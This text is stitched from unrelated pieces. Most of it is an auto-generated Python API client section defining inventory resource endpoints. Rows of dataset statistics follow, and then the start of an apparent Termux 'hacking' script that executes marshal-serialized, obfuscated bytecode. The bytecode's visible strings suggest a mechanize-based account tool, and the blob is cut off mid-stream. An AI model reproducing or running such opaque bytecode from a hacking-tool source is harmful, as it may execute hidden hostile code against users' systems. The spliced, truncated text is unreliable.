moid (str): The unique Moid identifier of a resource instance.
Keyword Args:
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventoryHolder
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
return self.call_with_http_info(**kwargs)
self.get_inventory_generic_inventory_holder_by_moid = _Endpoint(
settings={
'response_type': (InventoryGenericInventoryHolder,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventoryHolders/{Moid}',
'operation_id': 'get_inventory_generic_inventory_holder_by_moid',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'moid',
],
'required': [
'moid',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
},
'attribute_map': {
'moid': 'Moid',
},
'location_map': {
'moid': 'path',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_generic_inventory_holder_by_moid
)
def __get_inventory_generic_inventory_holder_list(
self,
**kwargs
):
"""Read a 'inventory.GenericInventoryHolder' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_generic_inventory_holder_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventoryHolderResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_inventory_generic_inventory_holder_list = _Endpoint(
settings={
'response_type': (InventoryGenericInventoryHolderResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventoryHolders',
'operation_id': 'get_inventory_generic_inventory_holder_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_generic_inventory_holder_list
)
def __get_inventory_generic_inventory_list(
self,
**kwargs
):
"""Read a 'inventory.GenericInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_inventory_generic_inventory_list(async_req=True)
>>> result = thread.get()
Keyword Args:
filter (str): Filter criteria for the resources to return. A URI with a $filter query option identifies a subset of the entries from the Collection of Entries. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the $filter option. The expression language that is used in $filter queries supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false).. [optional] if omitted the server will use the default value of ""
orderby (str): Determines what properties are used to sort the collection of resources.. [optional]
top (int): Specifies the maximum number of resources to return in the response.. [optional] if omitted the server will use the default value of 100
skip (int): Specifies the number of resources to skip in the response.. [optional] if omitted the server will use the default value of 0
select (str): Specifies a subset of properties to return.. [optional] if omitted the server will use the default value of ""
expand (str): Specify additional attributes or related resources to return in addition to the primary resources.. [optional]
apply (str): Specify one or more transformation operations to perform aggregation on the resources. The transformations are processed in order with the output from a transformation being used as input for the subsequent transformation. The \"$apply\" query takes a sequence of set transformations, separated by forward slashes to express that they are consecutively applied, i.e. the result of each transformation is the input to the next transformation. Supported aggregation methods are \"aggregate\" and \"groupby\". The **aggregate** transformation takes a comma-separated list of one or more aggregate expressions as parameters and returns a result set with a single instance, representing the aggregated value for all instances in the input set. The **groupby** transformation takes one or two parameters and 1. Splits the initial set into subsets where all instances in a subset have the same values for the grouping properties specified in the first parameter, 2. Applies set transformations to each subset according to the second parameter, resulting in a new set of potentially different structure and cardinality, 3. Ensures that the instances in the result set contain all grouping properties with the correct values for the group, 4. Concatenates the intermediate result sets into one result set. A groupby transformation affects the structure of the result set.. [optional]
count (bool): The $count query specifies the service should return the count of the matching resources, instead of returning the resources.. [optional]
inlinecount (str): The $inlinecount query option allows clients to request an inline count of the matching resources included with the resources in the response.. [optional] if omitted the server will use the default value of "allpages"
at (str): Similar to \"$filter\", but \"at\" is specifically used to filter versioning information properties for resources to return. A URI with an \"at\" Query Option identifies a subset of the Entries from the Collection of Entries identified by the Resource Path section of the URI. The subset is determined by selecting only the Entries that satisfy the predicate expression specified by the query option. The expression language that is used in at operators supports references to properties and literals. The literal values can be strings enclosed in single quotes, numbers and boolean values (true or false) or any of the additional literal representations shown in the Abstract Type System section.. [optional]
tags (str): The 'tags' parameter is used to request a summary of the Tag utilization for this resource. When the 'tags' parameter is specified, the response provides a list of tag keys, the number of times the key has been used across all documents, and the tag values that have been assigned to the tag key.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventoryResponse
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
return self.call_with_http_info(**kwargs)
self.get_inventory_generic_inventory_list = _Endpoint(
settings={
'response_type': (InventoryGenericInventoryResponse,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventories',
'operation_id': 'get_inventory_generic_inventory_list',
'http_method': 'GET',
'servers': None,
},
params_map={
'all': [
'filter',
'orderby',
'top',
'skip',
'select',
'expand',
'apply',
'count',
'inlinecount',
'at',
'tags',
],
'required': [],
'nullable': [
],
'enum': [
'inlinecount',
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
('inlinecount',): {
"ALLPAGES": "allpages",
"NONE": "none"
},
},
'openapi_types': {
'filter':
(str,),
'orderby':
(str,),
'top':
(int,),
'skip':
(int,),
'select':
(str,),
'expand':
(str,),
'apply':
(str,),
'count':
(bool,),
'inlinecount':
(str,),
'at':
(str,),
'tags':
(str,),
},
'attribute_map': {
'filter': '$filter',
'orderby': '$orderby',
'top': '$top',
'skip': '$skip',
'select': '$select',
'expand': '$expand',
'apply': '$apply',
'count': '$count',
'inlinecount': '$inlinecount',
'at': 'at',
'tags': 'tags',
},
'location_map': {
'filter': 'query',
'orderby': 'query',
'top': 'query',
'skip': 'query',
'select': 'query',
'expand': 'query',
'apply': 'query',
'count': 'query',
'inlinecount': 'query',
'at': 'query',
'tags': 'query',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json',
'text/csv',
'application/vnd.openxmlformats-officedocument.spreadsheetml.sheet'
],
'content_type': [],
},
api_client=api_client,
callable=__get_inventory_generic_inventory_list
)
def __patch_inventory_generic_inventory(
self,
moid,
inventory_generic_inventory,
**kwargs
):
"""Update a 'inventory.GenericInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_inventory_generic_inventory(moid, inventory_generic_inventory, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
inventory_generic_inventory (InventoryGenericInventory): The 'inventory.GenericInventory' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['inventory_generic_inventory'] = \
inventory_generic_inventory
return self.call_with_http_info(**kwargs)
self.patch_inventory_generic_inventory = _Endpoint(
settings={
'response_type': (InventoryGenericInventory,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventories/{Moid}',
'operation_id': 'patch_inventory_generic_inventory',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'inventory_generic_inventory',
'if_match',
],
'required': [
'moid',
'inventory_generic_inventory',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'inventory_generic_inventory':
(InventoryGenericInventory,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'inventory_generic_inventory': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_inventory_generic_inventory
)
def __patch_inventory_generic_inventory_holder(
self,
moid,
inventory_generic_inventory_holder,
**kwargs
):
"""Update a 'inventory.GenericInventoryHolder' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.patch_inventory_generic_inventory_holder(moid, inventory_generic_inventory_holder, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
inventory_generic_inventory_holder (InventoryGenericInventoryHolder): The 'inventory.GenericInventoryHolder' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventoryHolder
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['inventory_generic_inventory_holder'] = \
inventory_generic_inventory_holder
return self.call_with_http_info(**kwargs)
self.patch_inventory_generic_inventory_holder = _Endpoint(
settings={
'response_type': (InventoryGenericInventoryHolder,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventoryHolders/{Moid}',
'operation_id': 'patch_inventory_generic_inventory_holder',
'http_method': 'PATCH',
'servers': None,
},
params_map={
'all': [
'moid',
'inventory_generic_inventory_holder',
'if_match',
],
'required': [
'moid',
'inventory_generic_inventory_holder',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'inventory_generic_inventory_holder':
(InventoryGenericInventoryHolder,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'inventory_generic_inventory_holder': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__patch_inventory_generic_inventory_holder
)
def __update_inventory_generic_inventory(
self,
moid,
inventory_generic_inventory,
**kwargs
):
"""Update a 'inventory.GenericInventory' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_inventory_generic_inventory(moid, inventory_generic_inventory, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
inventory_generic_inventory (InventoryGenericInventory): The 'inventory.GenericInventory' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventory
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['inventory_generic_inventory'] = \
inventory_generic_inventory
return self.call_with_http_info(**kwargs)
self.update_inventory_generic_inventory = _Endpoint(
settings={
'response_type': (InventoryGenericInventory,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventories/{Moid}',
'operation_id': 'update_inventory_generic_inventory',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'inventory_generic_inventory',
'if_match',
],
'required': [
'moid',
'inventory_generic_inventory',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'inventory_generic_inventory':
(InventoryGenericInventory,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'inventory_generic_inventory': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_inventory_generic_inventory
)
def __update_inventory_generic_inventory_holder(
self,
moid,
inventory_generic_inventory_holder,
**kwargs
):
"""Update a 'inventory.GenericInventoryHolder' resource. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.update_inventory_generic_inventory_holder(moid, inventory_generic_inventory_holder, async_req=True)
>>> result = thread.get()
Args:
moid (str): The unique Moid identifier of a resource instance.
inventory_generic_inventory_holder (InventoryGenericInventoryHolder): The 'inventory.GenericInventoryHolder' resource to update.
Keyword Args:
if_match (str): For methods that apply server-side changes, and in particular for PUT, If-Match can be used to prevent the lost update problem. It can check if the modification of a resource that the user wants to upload will not override another change that has been done since the original resource was fetched. If the request cannot be fulfilled, the 412 (Precondition Failed) response is returned. When modifying a resource using POST or PUT, the If-Match header must be set to the value of the resource ModTime property after which no lost update problem should occur. For example, a client send a GET request to obtain a resource, which includes the ModTime property. The ModTime indicates the last time the resource was created or modified. The client then sends a POST or PUT request with the If-Match header set to the ModTime property of the resource as obtained in the GET request.. [optional]
_return_http_data_only (bool): response data without head status
code and headers. Default is True.
_preload_content (bool): if False, the urllib3.HTTPResponse object
will be returned without reading/decoding response data.
Default is True.
_request_timeout (float/tuple): timeout setting for this request. If one
number provided, it will be total request timeout. It can also
be a pair (tuple) of (connection, read) timeouts.
Default is None.
_check_input_type (bool): specifies if type checking
should be done one the data sent to the server.
Default is True.
_check_return_type (bool): specifies if type checking
should be done one the data received from the server.
Default is True.
_host_index (int/None): specifies the index of the server
that we want to use.
Default is read from the configuration.
async_req (bool): execute request asynchronously
Returns:
InventoryGenericInventoryHolder
If the method is called asynchronously, returns the request
thread.
"""
kwargs['async_req'] = kwargs.get(
'async_req', False
)
kwargs['_return_http_data_only'] = kwargs.get(
'_return_http_data_only', True
)
kwargs['_preload_content'] = kwargs.get(
'_preload_content', True
)
kwargs['_request_timeout'] = kwargs.get(
'_request_timeout', None
)
kwargs['_check_input_type'] = kwargs.get(
'_check_input_type', True
)
kwargs['_check_return_type'] = kwargs.get(
'_check_return_type', True
)
kwargs['_host_index'] = kwargs.get('_host_index')
kwargs['moid'] = \
moid
kwargs['inventory_generic_inventory_holder'] = \
inventory_generic_inventory_holder
return self.call_with_http_info(**kwargs)
self.update_inventory_generic_inventory_holder = _Endpoint(
settings={
'response_type': (InventoryGenericInventoryHolder,),
'auth': [
'cookieAuth',
'http_signature',
'oAuth2',
'oAuth2'
],
'endpoint_path': '/api/v1/inventory/GenericInventoryHolders/{Moid}',
'operation_id': 'update_inventory_generic_inventory_holder',
'http_method': 'POST',
'servers': None,
},
params_map={
'all': [
'moid',
'inventory_generic_inventory_holder',
'if_match',
],
'required': [
'moid',
'inventory_generic_inventory_holder',
],
'nullable': [
],
'enum': [
],
'validation': [
]
},
root_map={
'validations': {
},
'allowed_values': {
},
'openapi_types': {
'moid':
(str,),
'inventory_generic_inventory_holder':
(InventoryGenericInventoryHolder,),
'if_match':
(str,),
},
'attribute_map': {
'moid': 'Moid',
'if_match': 'If-Match',
},
'location_map': {
'moid': 'path',
'inventory_generic_inventory_holder': 'body',
'if_match': 'header',
},
'collection_format_map': {
}
},
headers_map={
'accept': [
'application/json'
],
'content_type': [
'application/json',
'application/json-patch+json'
]
},
api_client=api_client,
callable=__update_inventory_generic_inventory_holder
)
| 48.636595
| 1,678
| 0.529557
| 9,248
| 95,425
| 5.304931
| 0.058607
| 0.016694
| 0.040766
| 0.025275
| 0.92232
| 0.917305
| 0.906258
| 0.895108
| 0.890726
| 0.889829
| 0
| 0.002801
| 0.397715
| 95,425
| 1,961
| 1,679
| 48.661397
| 0.850817
| 0.452072
| 0
| 0.75
| 0
| 0
| 0.229625
| 0.065427
| 0
| 0
| 0
| 0
| 0
| 1
| 0.010116
| false
| 0
| 0.010116
| 0
| 0.030347
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
90e6fb8da7d70feb4d2d7738e3d21dfa78f46445
| 24,063
|
py
|
Python
|
Termux-Hacking/911TOOL.py
|
koleksibot/Sofware-Tools
|
8a67c34402e7c431bfcb15223d80570ed0aa258d
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 12
|
2022-01-25T11:36:47.000Z
|
2022-03-27T02:11:15.000Z
|
Termux-Hacking/911TOOL.py
|
tahaluindo/Sofware-Tools
|
1ec24f1e8978ee7ae51fc8268731b2c10e185903
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 4
|
2022-03-06T15:07:10.000Z
|
2022-03-26T18:50:06.000Z
|
Termux-Hacking/911TOOL.py
|
koleksibot/Sofware-Tools
|
8a67c34402e7c431bfcb15223d80570ed0aa258d
|
[
"Apache-2.0",
"CC-BY-4.0"
] | 24
|
2021-12-10T05:39:58.000Z
|
2022-03-27T08:10:57.000Z
|
#Compiled By xNot_Found
#Github : https://github.com/hatakecnk
import marshal
exec(marshal.loads('c\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00@\x00\x00\x00s\xa4\x01\x00\x00d\x00\x00d\x01\x00l\x00\x00Z\x00\x00d\x00\x00d\x01\x00l\x01\x00Z\x01\x00d\x00\x00d\x01\x00l\x02\x00Z\x02\x00d\x00\x00d\x01\x00l\x03\x00Z\x03\x00d\x00\x00d\x01\x00l\x04\x00Z\x04\x00d\x00\x00d\x01\x00l\x05\x00Z\x05\x00d\x00\x00d\x01\x00l\x06\x00Z\x06\x00d\x00\x00d\x01\x00l\x07\x00Z\x07\x00d\x00\x00d\x01\x00l\x08\x00Z\x08\x00d\x00\x00d\x01\x00l\t\x00Z\t\x00d\x00\x00d\x01\x00l\n\x00Z\n\x00d\x00\x00d\x01\x00l\x0b\x00Z\x0b\x00d\x00\x00d\x01\x00l\x0c\x00Z\x0c\x00d\x00\x00d\x02\x00l\r\x00m\x0e\x00Z\x0e\x00\x01d\x00\x00d\x03\x00l\x0f\x00m\x10\x00Z\x10\x00\x01d\x00\x00d\x04\x00l\x0c\x00m\x11\x00Z\x11\x00\x01e\x12\x00e\x01\x00\x83\x01\x00\x01e\x01\x00j\x13\x00d\x05\x00\x83\x01\x00\x01e\x0c\x00j\x11\x00\x83\x00\x00Z\x14\x00e\x14\x00j\x15\x00e\x16\x00\x83\x01\x00\x01e\x14\x00j\x17\x00e\x0c\x00j\x18\x00j\x19\x00\x83\x00\x00d\x06\x00d\x07\x00\x83\x01\x01\x01d\x19\x00g\x01\x00e\x14\x00_\x1a\x00d\n\x00Z\x1b\x00d\x0b\x00Z\x1c\x00d\x0c\x00Z\x1d\x00d\r\x00Z\x1e\x00d\x0e\x00Z\x1f\x00d\x0f\x00Z 